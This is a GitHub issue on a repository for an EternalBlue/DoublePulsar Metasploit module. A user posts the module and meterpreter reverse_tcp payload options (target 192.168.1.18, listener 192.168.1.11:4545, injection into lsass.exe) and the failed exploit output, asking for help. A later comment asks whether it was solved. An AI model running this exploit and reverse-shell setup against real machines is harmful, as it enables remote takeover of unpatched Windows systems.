Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.08k stars 519 forks source link

Error getting output back from Core; aborting... #62

Open beerkala opened 6 years ago

beerkala commented 6 years ago

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name Current Setting Required Description


DOUBLEPULSARPATH /home/metasploit/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /home/metasploit/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT lsass.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST 192.168.1.18 yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description


EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.11 yes The listen address LPORT 4545 yes The listen port

Exploit target:

Id Name


8 Windows 7 (all services pack) (x86) (x64)

msf exploit(eternalblue_doublepulsar) > exploit

[] Started reverse TCP handler on 192.168.1.11:4545 [] 192.168.1.18:445 - Generating Eternalblue XML data [] 192.168.1.18:445 - Generating Doublepulsar XML data [] 192.168.1.18:445 - Generating payload DLL for Doublepulsar [] 192.168.1.18:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.1.18:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.1.18:445 - Are you sure it's vulnerable? [] 192.168.1.18:445 - Launching Doublepulsar... [-] 192.168.1.18:445 - Oops, something was wrong! [] Exploit completed, but no session was created. msf exploit(eternalblue_doublepulsar) >

AoG22 commented 3 years ago

HAVE YOU SOLVED IT ?